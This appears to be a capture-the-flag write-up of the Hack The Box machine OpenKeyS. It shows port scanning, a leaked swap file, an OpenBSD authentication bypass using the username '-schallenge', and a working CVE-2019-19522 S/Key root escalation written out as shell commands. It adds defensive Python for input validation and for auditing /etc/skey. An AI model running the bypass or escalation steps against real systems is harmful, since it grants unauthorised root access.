OpenKeyS was, at the time, one of the few boxes I had done that revolved around exploiting published vulnerabilities. It was very fun and interesting, to say the least. Even though it was rated as Medium, it was fairly easy to tackle if your enumeration was done right.
Enumeration
Masscan: Finding Open Ports
Here, we will be looking for any open ports, both TCP and UDP, to then find our attack path once further port scanning has been completed.
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ sudo masscan -e tun1 -p1-65535,U:1-65535 10.10.10.199 --rate=1000 | tee OpenKeys_OpenPorts.log
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-09-13 15:13:54 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.199
Discovered open port 22/tcp on 10.10.10.199
Nmap: Port Scanning
Using the log file created by the masscan execution, we will filter out the port numbers to simplify our lives. In this case, as we only have two ports to enumerate, we could have saved that step.
At this point in my process I was relying on aggressive scanning, which is technically not necessary and should not be done if we do not want to be detected.
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ PORTS=$(cat OpenKeys_OpenPorts.log | grep open | cut -d" " -f4 | cut -d"/" -f1 | xargs | tr " " ",")
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ nmap -A -sV -p $PORTS openkeys.htb -oN OpenKeys_PortScan.log -oX OpenKeys_PortScan.xml
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 11:18 EDT
Nmap scan report for openkeys.htb (10.10.10.199)
Host is up (0.19s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 5e:ff:81:e9:1f:9b:f8:9a:25:df:5d:82:1a:dd:7a:81 (RSA)
| 256 64:7a:5a:52:85:c5:6d:d5:4a:6b:a7:1a:9a:8a:b9:bb (ECDSA)
|_ 256 12:35:4b:6e:23:09:dc:ea:00:8c:72:20:c7:50:32:f3 (ED25519)
80/tcp open http OpenBSD httpd
|_http-title: Site doesn't have a title (text/html).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.11 seconds
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ nmap -sV -p 22 openkeys.htb --script vulners
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 11:31 EDT
Nmap scan report for openkeys.htb (10.10.10.199)
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.1 (protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.1:
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
|_ CVE-2014-9278 4.0 https://vulners.com/cve/CVE-2014-9278
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.43 seconds
Gobuster: Directory Enumeration
Given the exposed web service, directory enumeration is the next step. At the same time, we must keep in mind that nothing is off the table: the OpenBSD SSH service must also be researched.
Inspecting /includes gave us access to a swap file. We need to retrieve it in order to inspect it offline.
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ wget http://openkeys.htb/includes/auth.php.swp
--2020-09-13 12:40:05-- http://openkeys.htb/includes/auth.php.swp
Resolving openkeys.htb (openkeys.htb)... 10.10.10.199
Connecting to openkeys.htb (openkeys.htb)|10.10.10.199|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘auth.php.swp’
auth.php.swp [ <=> ] 12.00K 29.4KB/s in 0.4s
2020-09-13 12:40:05 (29.4 KB/s) - ‘auth.php.swp’ saved [12288]
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ strings auth.php.swp
b0VIM 8.1
jennifer
openkeys.htb
/var/www/htdocs/includes/auth.php
3210
#"!
session_start();
session_destroy();
session_unset();
function close_session()
$_SESSION["username"] = $_REQUEST['username'];
$_SESSION["user_agent"] = $_SERVER['HTTP_USER_AGENT'];
$_SESSION["remote_addr"] = $_SERVER['REMOTE_ADDR'];
$_SESSION["last_activity"] = $_SERVER['REQUEST_TIME'];
$_SESSION["login_time"] = $_SERVER['REQUEST_TIME'];
$_SESSION["logged_in"] = True;
function init_session()
}
return False;
{
else
}
}
return True;
$_SESSION['last_activity'] = $time;
// Session is active, update last activity time and return True
{
else
}
return False;
close_session();
{
($time - $_SESSION['last_activity']) > $session_timeout)
if (isset($_SESSION['last_activity']) &&
$time = $_SERVER['REQUEST_TIME'];
// Has the session expired?
{
if(isset($_SESSION["logged_in"]))
// Is the user logged in?
session_start();
// Start the session
$session_timeout = 300;
// Session timeout in seconds
function is_active_session()
return $retcode;
system($cmd, $retcode);
$cmd = escapeshellcmd("../auth_helpers/check_auth " . $username . " " . $password);
function authenticate($username, $password)
<?php
As you can see in the strings output above, the swap file header names jennifer, which gives us a potential user.
After researching the SSH banner information, it seems there are some vulnerabilities that we can attempt.
In this case, we can try -schallenge as the username in the HTTP request, but we also need to specify the potential user jennifer in the request header, which we supply along with the session cookie.
BINGO!! What we just retrieved is the SSH private key of 'jennifer'. Let's use it to access the system as this user.
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ ssh -i jennifer.key jennifer@openkeys.htb
Last login: Wed Jun 24 09:31:16 2020 from 10.10.14.2
OpenBSD 6.6 (GENERIC) #353: Sat Oct 12 10:45:56 MDT 2019
Welcome to OpenBSD: The proactively secure Unix-like operating system.
Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code. With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.
openkeys$ id
uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel)
openkeys$ ls
user.txt
openkeys$ cat user.txt
36ab21********************1d2b10
And we have found the user flag! Let's follow on and attempt to escalate privileges using a vulnerability related to the one we used against httpd.
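Before moving on to privilege escalation, here is the defensive counterpart of the authenticate() function recovered from the swap file. This is an added example written for this writeup in Python, not the box's own PHP: it assumes the same check_auth helper path and shows the two changes that stop a username such as -schallenge (or one carrying spaces or shell metacharacters) from ever reaching the authenticator.

```python
import re
import subprocess

# Conservative login-name pattern: the first character is a letter, digit or
# underscore, so a value such as "-schallenge" can never start with '-', and
# nothing containing spaces or shell metacharacters gets through either.
LOGIN_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,31}$")

# Helper path exactly as it appears in the recovered auth.php.
CHECK_AUTH = "../auth_helpers/check_auth"


def is_valid_username(username: str) -> bool:
    """True only for names matching LOGIN_NAME; option-like values are rejected."""
    return bool(LOGIN_NAME.match(username))


def build_check_auth_argv(username: str, password: str) -> list:
    """Argument vector for check_auth.

    Passing a list to subprocess means no shell is involved, so no
    escapeshellcmd()-style escaping is needed and a space in the username
    cannot turn into an extra argument for the helper."""
    if not is_valid_username(username):
        raise ValueError(f"rejected username {username!r}")
    return [CHECK_AUTH, username, password]


def authenticate(username: str, password: str) -> bool:
    """Counterpart of the PHP authenticate(): True only when check_auth exits 0.

    Invalid usernames fail closed without the helper ever being executed."""
    try:
        argv = build_check_auth_argv(username, password)
    except ValueError:
        return False
    return subprocess.run(argv, check=False).returncode == 0
```

Patching libc is still the real fix for the bypass; the validation above is the defence in depth that keeps an application from handing the authentication subsystem a username it was never meant to see.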
Privilege Escalation
The vulnerability we used to bypass authentication against httpd is associated with CVE-2019-19522, through which local privilege escalation can be achieved via S/Key or YubiKey. In this case, we will leverage S/Key.
openkeys$ cd /tmp
openkeys$ echo 'root md5 0100 obsd91335 8b6d96e0ef1b1c21' > /etc/skey/root
openkeys$ chmod 0600 /etc/skey/root
openkeys$ env -i TERM=vt220 su -l -a skey
otp-md5 99 obsd91335
S/Key Password:
S/Key Password [echo on]:
Sorry
openkeys$ env -i TERM=vt220 su -l -a skey
otp-md5 99 obsd91335
S/Key Password: EGG LARD GROW HOG DRAG LAIN
openkeys# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
As shown above, by following the associated vulnerability specifications, we were able to escalate privileges. Now, let's grab the root flag:
openkeys# pwd
/root
openkeys# ls
.Xdefaults .cshrc .forward .profile .viminfo root.txt
.composer .cvsrc .login .ssh dead.letter
openkeys# cat dead.letter
Date: Sun, 13 Sep 2020 15:40:02 +0000 (UTC)
From: root (Cron Daemon)
To: root
Subject: Cron <root@openkeys> /usr/bin/find /tmp -name "sess*" -amin +5 -exec rm {} \;
Auto-Submitted: auto-generated
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <PATH=/bin:/sbin:/usr/bin:/usr/sbin>
X-Cron-Env: <HOME=/var/log>
X-Cron-Env: <LOGNAME=root>
X-Cron-Env: <USER=root>
rm: /tmp/sess_gvhju8kvqk0m4dup24fhsm3c15: No such file or directory
rm: /tmp/sess_euod42diulnrrbir7cp2ehdioa: No such file or directory
rm: /tmp/sess_j094qg8rs6kpk76k7ukb5tlt0c: No such file or directory
rm: /tmp/sess_m447es74eb7k33ro5c66bs2hiq: No such file or directory
rm: /tmp/sess_hg0vdh8grjilq15r26da6b2um8: No such file or directory
openkeys# cat root.txt
f3a553********************fc6efa
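The weakness behind this escalation is a world-writable /etc/skey that lets any local user create a record for another account. The following audit script is an added example, not part of the original writeup; its demo directory and account name are constructed. It reports that directory permission and any record not owned by the account it is named after, which is exactly the state the shell session above left behind.

```python
import os
import pwd
import stat
import tempfile


def owner_name(path: str) -> str:
    """User name owning path, or the numeric uid if it has no passwd entry."""
    uid = os.stat(path).st_uid
    try:
        return pwd.getpwuid(uid).pw_name
    except KeyError:
        return str(uid)


def audit_skey_dir(path: str = "/etc/skey") -> list:
    """Return human-readable findings for an S/Key directory; empty means clean.

    Two checks: the directory must not be world-writable (a world-writable
    /etc/skey is what let jennifer drop a record for root above), and each
    record file must be owned by the account it is named after, since a
    legitimate record for root is created by root, not by another user."""
    findings = []
    st = os.stat(path)
    if not stat.S_ISDIR(st.st_mode):
        return [f"{path} is not a directory"]
    if st.st_mode & stat.S_IWOTH:
        findings.append(f"{path} is world-writable (mode {oct(stat.S_IMODE(st.st_mode))})")
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        if not stat.S_ISREG(os.lstat(full).st_mode):
            continue  # only plain record files are of interest
        who = owner_name(full)
        if who != name:
            findings.append(f"record {name!r} is owned by {who!r}, not by {name!r}")
    return findings


def build_demo_dir() -> str:
    """Constructed stand-in for /etc/skey in the pre-fix state: mode 01733
    (sticky, world-writable) holding a record named after an account that the
    current user, not that account, created. Used only for the demonstration."""
    d = tempfile.mkdtemp(prefix="skey-demo-")
    os.chmod(d, 0o1733)
    with open(os.path.join(d, "constructed-account"), "w") as fh:
        fh.write("constructed-account md5 0100 obsd00000 0000000000000000\n")
    return d
```

On the host itself, call audit_skey_dir() with no argument; build_demo_dir() only exists so the check can be exercised offline.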
The OpenBSD authentication bypass vulnerability is one that can be used against multiple services hosted on OpenBSD.